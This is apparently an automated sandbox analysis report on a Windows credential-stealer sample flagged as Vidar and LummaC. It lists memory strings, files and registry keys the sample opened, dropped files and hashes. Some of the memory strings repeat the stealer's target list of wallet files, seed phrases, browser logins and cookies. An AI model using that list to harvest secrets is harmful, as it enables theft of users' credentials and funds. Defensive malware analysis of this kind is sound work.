Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70C40 sqlite3_bind_zeroblob,	4_2_6CA70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA70D60 sqlite3_bind_parameter_name,	4_2_6CA70D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C998EA0 sqlite3_clear_bindings,	4_2_6C998EA0

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1524997
Product:	CloudBasic
Start time:	15:13:09
Start date:	03.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c9784db0c88a05a8aae9ddb7289b51db
SHA1:	7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
SHA256:	fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\CBFCFBFBFB.exe	PE32 executable (GUI) Intel 80386, for MS Windows	49504D08DC10AECA7D36605D6A20BDE0	BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA	A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
C:\ProgramData\JJDBAEHIJKJK\BAECFC	ASCII text, with very long lines (1765), with CRLF line terminators	42594FD09C4DF3B174CF5D59B1CAB13A	1B78FEB748C36A592C468A76BB60E98187D7BE4A	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
C:\ProgramData\JJDBAEHIJKJK\BFCGDA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\ProgramData\JJDBAEHIJKJK\BGDGHJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\JJDBAEHIJKJK\DAAECA	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	BE99679A2B018331EACD3A1B680E3757	6E6732E173C91B0C3287AB4B161FE3676D33449A	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
C:\ProgramData\JJDBAEHIJKJK\DBKKFC	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	85D6E1D7F82C11DAC40C95C06B7B5DC5	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
C:\ProgramData\JJDBAEHIJKJK\DBKKFC-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJDBAEHIJKJK\EBGDHJ	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\JJDBAEHIJKJK\FIDHIE	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\JJDBAEHIJKJK\GCFBAK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\JJDBAEHIJKJK\GIJEGD	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\JJDBAEHIJKJK\GIJEGD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJDBAEHIJKJK\HCAEHD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\ProgramData\JJDBAEHIJKJK\IIJJDG	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CBFCFBFBFB.exe_dc97fc91233dc875f6b4e4fb767c1c44d31d15cc_45f160d2_cebbf0a7-e1d0-4076-98e3-b5c971e63e95\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1EC39636F364607B3F475FC918B8CE39	2BB80B48EA0BC9FC0F0B932A33A6CF31CD7FA492	47A45A304198444596AEE04A25F5F75F4BB4F183A30F806E6E0B88010CEA1C11
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_6d926f6c9da85a293d58c3cb45a16c531c4372_bfb0bb6b_780bf0d2-10e6-4629-ae6d-e52283072cc2\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	DAAB52D2F1E83D4BD2588453785ADE06	EBEA35B02F2606C49D8585815E58B78594F143AF	51373135C2EE8D2686B660B761405F2ADC671E4A9A72E1C4B4A6BE0BEBB69E1A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER48BE.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 13:14:07 2024, 0x1205a4 type	6E8AB42CAE05D404375BAB87E06B2BFC	263EE868457F48DF5B3A381EFB531C4CB8610F48	0260F6FDA8DC8617ABFCE3370C1890E4880F5FD9A0A15B2869D16884FA9ED7BE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4999.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	242FF77C82FF5A08EAD6395457CB79CF	C850B8EEBD457914C0140CFCB500F797192D39B3	4CFA249F1907DF254609BC505E7F637E1BDC2C28EF95DA28B422792898C79D34
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A75.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	FC43B11C5E1D9878DE95DEA461FB82C6	203E4715565A47302F5EDCD8257A00EE92F19AED	99B77060CBBC6D5718B26CF16DEA2869585E5BE1ABB48317F61CCA8A35C884B5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E06.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Oct 3 13:15:18 2024, 0x1205a4 type	D3F37597875DBACCC0F3E7CB7497F76B	D8567F7094E42CC7EB25B41AEA1BB00209144838	68F4CFF3936B4913E070A35D90149461CC8D88CAF74236F47C5F7CFF3E5032D5
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E46.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	A3B9A6E02523EAA283BF4555A8F0404E	1044CE0A6027A8C1581CDC2F1FCAC0B590B36C81	B191060DE377CA5E844CA3DCDC8FAC08A935446935DECE6508DF4F0022CA456E
